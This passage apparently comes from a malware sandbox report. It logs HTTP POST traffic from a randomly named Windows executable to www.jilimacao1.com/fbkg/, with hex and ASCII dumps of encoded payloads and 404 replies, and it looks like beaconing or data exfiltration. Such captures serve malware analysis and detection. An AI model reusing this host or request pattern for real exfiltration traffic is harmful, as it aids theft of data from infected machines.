57 53 48 6c 36 61 57 43 35 76 68 67 2f 67 63 4e 39 31 6e 68 58 34 51 59 48 76 75 65 53 6f 74 79 43 59 52 4f 63 47 39 53 73 42 34 70 62 56 57 35 69 34 53 71 4a 59 68 75 33 72 35 54 67 37 35 7a 47 77 49 4a 67 33 77 70 2b 59 72 6a 73 63 76 36 70 67 68 31 66 52 4e 4b 57 6c 38 34 57 65 32 62 76 77 58 71 4b 4b 50 6e 56 2b 38 57 41 68 54 33 31 59 3d
                                                                                                                                                                                                Data Ascii: T6I=M6L3kEuPiVYPfH1/E1ODT1PlRZJ1ExMfSYbh432ijfsFAlb1ntUJyGZUFlXDYODKE2axnJdqXELSzG/D5z7nReX69pbwkcqRe+F64vTH3OZf9vmT9wa1jJdn33cvL4AzOW3LwIFQGVNspLVFJvcW+oMw4HwxWcxH/YrVgvU6nqP2D7SyZH4ZqAmmXgJJ1eCOMhtmnXa0DZSV1KUKh7jhSt+V/6R5tSVAlM+6N+nPmfQxnQ49dUd7Tj1Ucyx6G8iJiTjpfFSOquiIIV5i+bT8sqaixc2jezq92OkMlipz82ILGRrRRZlefqftHmeEPZlWfLF/0Eo67lQUAFWRdHXhyzDH2kItCbjxA6m4ZQpmLcOyy3mDV6c2sRIRbay4N6qAf/btt77QDFl/gPBdylXP8WSHl6aWC5vhg/gcN91nhX4QYHvueSotyCYROcG9SsB4pbVW5i4SqJYhu3r5Tg75zGwIJg3wp+Yrjscv6pgh1fRNKWl84We2bvwXqKKPnV+8WAhT31Y=
                                                                                                                                                                                                Nov 17, 2023 19:27:52.531224012 CET544OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.jilimacao1.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.jilimacao1.com
                                                                                                                                                                                                Referer: http://www.jilimacao1.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 4d 36 4c 33 6b 45 75 50 69 56 59 50 66 48 31 2f 45 31 4f 44 54 31 50 6c 52 5a 4a 31 45 78 4d 66 53 59 62 68 34 33 32 69 6a 66 73 46 41 6c 62 31 6e 74 55 4a 79 47 5a 55 46 6c 58 44 59 4f 44 4b 45 32 61 78 6e 4a 64 71 58 45 4c 53 7a 47 2f 44 35 7a 37 6e 52 65 58 36 39 70 62 77 6b 63 71 52 65 2b 46 36 34 76 54 48 33 4f 5a 66 39 76 6d 54 39 77 61 31 6a 4a 64 6e 33 33 63 76 4c 34 41 7a 4f 57 33 4c 77 49 46 51 47 56 4e 73 70 4c 56 46 4a 76 63 57 2b 6f 4d 77 34 48 77 78 57 63 78 48 2f 59 72 56 67 76 55 36 6e 71 50 32 44 37 53 79 5a 48 34 5a 71 41 6d 6d 58 67 4a 4a 31 65 43 4f 4d 68 74 6d 6e 58 61 30 44 5a 53 56 31 4b 55 4b 68 37 6a 68 53 74 2b 56 2f 36 52 35 74 53 56 41 6c 4d 2b 36 4e 2b 6e 50 6d 66 51 78 6e 51 34 39 64 55 64 37 54 6a 31 55 63 79 78 36 47 38 69 4a 69 54 6a 70 66 46 53 4f 71 75 69 49 49 56 35 69 2b 62 54 38 73 71 61 69 78 63 32 6a 65 7a 71 39 32 4f 6b 4d 6c 69 70 7a 38 32 49 4c 47 52 72 52 52 5a 6c 65 66 71 66 74 48 6d 65 45 50 5a 6c 57 66 4c 46 2f 30 45 6f 36 37 6c 51 55 41 46 57 52 64 48 58 68 79 7a 44 48 32 6b 49 74 43 62 6a 78 41 36 6d 34 5a 51 70 6d 4c 63 4f 79 79 33 6d 44 56 36 63 32 73 52 49 52 62 61 79 34 4e 36 71 41 66 2f 62 74 74 37 37 51 44 46 6c 2f 67 50 42 64 79 6c 58 50 38 57 53 48 6c 36 61 57 43 35 76 68 67 2f 67 63 4e 39 31 6e 68 58 34 51 59 48 76 75 65 53 6f 74 79 43 59 52 4f 63 47 39 53 73 42 34 70 62 56 57 35 69 34 53 71 4a 59 68 75 33 72 35 54 67 37 35 7a 47 77 49 4a 67 33 77 70 2b 59 72 6a 73 63 76 36 70 67 68 31 66 52 4e 4b 57 6c 38 34 57 65 32 62 76 77 58 71 4b 4b 50 6e 56 2b 38 57 41 68 54 33 31 59 3d
                                                                                                                                                                                                Data Ascii: T6I=M6L3kEuPiVYPfH1/E1ODT1PlRZJ1ExMfSYbh432ijfsFAlb1ntUJyGZUFlXDYODKE2axnJdqXELSzG/D5z7nReX69pbwkcqRe+F64vTH3OZf9vmT9wa1jJdn33cvL4AzOW3LwIFQGVNspLVFJvcW+oMw4HwxWcxH/YrVgvU6nqP2D7SyZH4ZqAmmXgJJ1eCOMhtmnXa0DZSV1KUKh7jhSt+V/6R5tSVAlM+6N+nPmfQxnQ49dUd7Tj1Ucyx6G8iJiTjpfFSOquiIIV5i+bT8sqaixc2jezq92OkMlipz82ILGRrRRZlefqftHmeEPZlWfLF/0Eo67lQUAFWRdHXhyzDH2kItCbjxA6m4ZQpmLcOyy3mDV6c2sRIRbay4N6qAf/btt77QDFl/gPBdylXP8WSHl6aWC5vhg/gcN91nhX4QYHvueSotyCYROcG9SsB4pbVW5i4SqJYhu3r5Tg75zGwIJg3wp+Yrjscv6pgh1fRNKWl84We2bvwXqKKPnV+8WAhT31Y=
                                                                                                                                                                                                Nov 17, 2023 19:27:53.289205074 CET545INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Content-Length: 548
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:27:52 GMT
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                X-Cache: BYPASS
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                21192.168.11.205014834.126.191.8480C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:27:54.718319893 CET552OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.jilimacao1.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 52912
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.jilimacao1.com
                                                                                                                                                                                                Referer: http://www.jilimacao1.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 4d 36 4c 33 6b 45 75 50 69 56 59 50 66 48 31 2f 45 31 4f 44 54 31 50 6c 52 5a 4a 31 45 78 4d 66 53 59 62 68 34 33 32 69 6a 66 55 46 41 57 54 31 6f 73 55 4a 78 47 5a 55 47 6c 58 43 59 4f 43 59 45 79 33 36 6e 4a 5a 36 58 43 48 53 7a 58 76 44 36 42 44 6e 55 65 58 2f 67 5a 62 2b 7a 4d 71 4e 65 2b 59 74 34 76 47 38 77 2b 74 66 38 6f 43 54 35 48 47 79 76 35 63 4e 33 33 63 7a 64 34 41 37 4f 57 7a 62 77 49 4a 51 47 51 4e 73 70 36 70 46 61 75 63 57 6b 49 4e 43 74 58 77 31 64 38 78 32 2f 59 2f 72 67 76 55 41 6e 6f 2f 32 44 35 61 79 57 6b 51 65 70 67 6d 6d 55 67 4a 4b 78 65 50 6d 4d 6e 49 31 6e 58 65 30 44 62 69 56 32 71 55 4b 77 71 6a 69 66 64 2b 70 70 4b 51 76 67 79 5a 59 6c 50 44 4a 4e 36 72 50 6d 76 45 78 6b 48 59 39 66 31 64 37 62 6a 31 57 59 79 78 74 66 73 69 76 69 54 53 56 66 46 79 30 71 74 4f 49 5a 41 4e 69 38 35 37 37 72 4b 61 73 2b 38 33 37 56 54 32 78 32 4f 30 49 6c 69 6f 34 38 7a 77 4c 47 42 37 52 51 62 4e 64 65 61 65 45 50 47 66 65 61 4a 70 4d 66 4c 59 79 30 45 51 71 37 6d 38 55 41 6c 57 52 57 41 44 75 34 44 44 63 30 6b 4a 77 50 37 69 33 41 36 71 43 5a 55 77 62 4b 73 69 79 6a 58 32 44 52 71 63 35 6e 52 4a 35 52 36 79 32 47 61 71 41 66 2f 6e 58 74 37 33 51 41 30 64 2f 68 38 5a 64 69 69 4c 50 37 6d 54 4f 6c 36 61 44 43 35 6a 6f 67 2f 6f 32 4e 39 46 4a 68 56 30 51 59 57 2f 75 54 78 77 75 35 53 59 51 4b 63 48 6e 66 4d 63 67 70 62 34 61 35 69 6f 73 72 36 63 68 76 33 37 35 58 67 37 36 6a 32 77 4c 5a 77 33 63 37 4f 45 33 6a 73 41 56 36 71 38 78 31 59 56 4e 4a 69 6f 6d 67 32 47 57 5a 39 4d 48 69 74 32 35 74 6a 71 71 4b 41 74 31 6a 43 41 49 34 30 59 53 2b 48 33 4b 37 4c 7a 38 2b 6b 31 78 51 78 54 4d 6a 6c 68 68 66 72 78 37 49 78 53 34 6d 65 52 5a 48 58 7a 50 7a 52 48 38 49 65 48 48 56 63 68 30 38 6e 44 2b 39 61 6a 65 46 58 75 56 4d 64 58 7a 4b 6b 74 49 33 2b 2b 57 77 73 49 63 6b 4a 6f 5a 34 66 78 67 31 58 52 4c 51 4b 4e 56 6c 4d 79 74 49 52 45 53 59 56 5a 30 76 78 75 73 34 4d 38 38 34 66 53 73 4c 76 72 77 73 62 30 5a 62 38 30 56 39 77 4f 63 4d 34 44 62 37 6b 5a 2f 48 48 69 58 6f 75 75 70 63 41 73 58 4c 41 49 6d 39 67 77 66 6b 73 76 31 75 4b 69 56 59 32 45 45 48 66 77 6b 59 37 52 4f 72 5a 77 4e 4d 52 58 45 36 4f 47 68 51 35 7a 67 42 44 48 79 4f 51 77 77 4d 52 74 6e 4b 70 4e 41 62 33 66 75 32 49 31 37 42 35 55 42 72 4a 78 6b 64 51 75 48 2b 4b 72 6f 6d 72 71 69 34 70 37 4a 42 48 48 6c 37 6b 53 49 61 48 47 45 64 75 63 74 50 70 6f 38 76 33 7a 42 31 6a 56 6c 4b 70 70 75 59 67 53 6c 63 68 6d 76 4c 61 2f 64 53 6d 48 36 44 30 57 53 33 30 32 71 79 74 35 33 48 6f 66 46 30 58 2b 38 77 63 56 33 6b 41 78 52 62 70 6e 5a 4b 4c 6b 36 47 66 54 55 66 64 6d 4c 46 71 57 4e 48 66 6f 73 4c 76 48 72 77 32 46 77 78 4b 39 46 54 4d 6e 57 53 58 71 55 56 79 57 72 43 43 73 4f 6c 74 75 75 62 6d 6f 49 39 6c 79 41 4e 59 35 4b 4f 32 31 68 72 51 32 38 76 49 62 48 68 78 62 76 6d 66 72 43 4e 43 68 47 6c 63 6b 44 57 59 47 65 70 70 41 6a 76 7a 34 42 38 61 56 34 43 4c 47 67 61 70 2b 55 35 71 2f 66 39 6a 31 54 31 71 7a 74 44 67 67 4b 77 44 71 38 32 75 75 6e 6e 4f 70 54 53 6f 75 32 59 45 64 65 69 4a 30 39 69 44 37 51 6d 62 59 64 51 6a 50 38 54 68 36 36 35 78 62 45 6a 76 7a 33 4b 47 44 49 51 39 66 74 4a 39 32 4d 75 7a 6a 67 72 69 59 34 68 46 38 46 55 6c 78 75 76 53 34 57 49 73 4a 2b 6f 57 55 59 53 45 43 39 39 46 62 70 38 6c 32 66 53 49 52 71 56 63 59 6a 6a 4f 38 4a 45 66 50 45 6e 54 4d 4b 50 67 4f 44 69 55 41 6a 78 36 72 61 51 73 52 72 74 74 53 73 36 68 56 79 44 55 6f 69 61 43 59 4c 7a 56 54 67 6a 43 46 6d 4c 66 31 65 49 71 74 59 38 4c 62 30 37 57 4a 35 6b 33 56 64 31 44 76 67 6f 47 36 61 34 34 45 59 43 66 62 64 4c 52 77 30 4e 47 76 67 47 68 2f 4f 5a 67 6c 73 6a 58 6d 2b 62 48 35 69 4f 4b 53 58 6d 54 35 4a 49 6b 33 4a 51 47 45 56 53 70 65 47 54 58 4e 68 65 57 57 71 75 49 51 64 36 74 64 37 39 4b 45 55 32 71 78 4b 57 31 36 62 4b 5a 71 6b 62 72 77 70 36 72 73 39 64 51 32 41 51 57 79 63 6d 35 39 4f 77 68 4c 72 63 33 72 55 4b 48 76 43 63 62 6c 78 33 54 31 48 65 34 39 73 4a 71 4d 57 37 2f 43 6c 53 6b 7a 4d 69 6a 75 71 74 7a 55 77 6e 52 39 51 4f 69 52 51 68 79 72 5a 4a 4f 37 63 66 59 66 71 53 77 42 30 45 33 78 31 75 58 75 76 4e 34 44 32 6c 65 69 78 61 7a 77
                                                                                                                                                                                                Data Ascii: T6I=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
                                                                                                                                                                                                Nov 17, 2023 19:27:54.718415022 CET558OUTData Raw: 46 51 75 57 66 78 42 56 50 37 4b 50 38 77 72 4d 53 47 66 37 76 6e 37 5a 79 73 6b 6d 35 71 4d 6f 4f 43 4b 42 74 44 55 55 5a 4a 6b 6e 78 55 4f 77 61 76 52 64 55 42 75 58 58 61 58 4c 4b 59 76 56 6b 66 61 5a 56 4c 33 4d 6b 7a 77 4a 6a 78 6d 36 57 4e
                                                                                                                                                                                                Data Ascii: FQuWfxBVP7KP8wrMSGf7vn7Zyskm5qMoOCKBtDUUZJknxUOwavRdUBuXXaXLKYvVkfaZVL3MkzwJjxm6WNjwayoQwA2et+tdCoMchDl92PFELrASkcHCNCofgPePuWpNyQAHRcM4MwijdH3rWjB7dMcq8aI6Gmitrl8IpmNluatPYXG1fapm6bvNmbqODiLe+oomA0EP4mT9iUkopVqVpBXANl8bdJTwRKPMaFihmh0unVUl6ks
                                                                                                                                                                                                Nov 17, 2023 19:27:55.060394049 CET563OUTData Raw: 38 64 71 6c 43 34 59 72 53 71 5a 33 59 54 32 49 58 78 6d 45 65 5a 7a 4a 79 50 6b 4d 65 4b 4a 4c 4d 6f 7a 2f 30 48 36 70 75 47 63 36 32 49 6e 39 54 7a 67 78 76 6d 46 53 4b 54 64 70 47 69 68 67 66 4b 43 4e 76 77 38 50 4d 2f 35 48 65 42 56 79 2f 59
                                                                                                                                                                                                Data Ascii: 8dqlC4YrSqZ3YT2IXxmEeZzJyPkMeKJLMoz/0H6puGc62In9TzgxvmFSKTdpGihgfKCNvw8PM/5HeBVy/YFp9MhAILwe2lXL1zX6FD2tcvYTQjyOfInkJ8Raqt+VWP0/6zI2kg1yF6hrFQUg6SKhzayllduuuSgVKfmYPurMrUe6IIQ4e7g00nxPpAblPve7pxqgeRiqs8vruczlYolj7J5BO/NR5K/+qwC+cbQbw9kcq6ygor1
                                                                                                                                                                                                Nov 17, 2023 19:27:55.905519962 CET564OUTData Raw: 53 38 73 38 77 58 64 4b 6e 45 53 2f 33 56 48 6f 67 6a 33 6a 34 50 65 57 46 64 75 58 62 37 4f 4b 54 36 50 31 78 58 77 71 59 78 77 7a 2b 68 65 6e 64 58 56 30 36 43 59 55 59 45 45 4b 62 43 34 4d 64 38 7a 41 32 4e 38 46 4a 59 2f 6c 30 63 4e 33 72 57
                                                                                                                                                                                                Data Ascii: S8s8wXdKnES/3VHogj3j4PeWFduXb7OKT6P1xXwqYxwz+hendXV06CYUYEEKbC4Md8zA2N8FJY/l0cN3rWlQ6eLvuT0QqsOZr+PGCyujxnvkzjt3vCNWbd7G+rAqib0DlHju25jw8zc/9pPmUcdfLZMK0Gdjuert9HyRA/dMTcGzY8vAGLrNI1NJtlfHjwf82czZw3tJCv/083FITxhefj8npX6Egwv4qjCNhoUdEbV8cTwQsY9
                                                                                                                                                                                                Nov 17, 2023 19:27:57.116523027 CET586INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Content-Length: 548
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:27:54 GMT
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                X-Cache: BYPASS
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 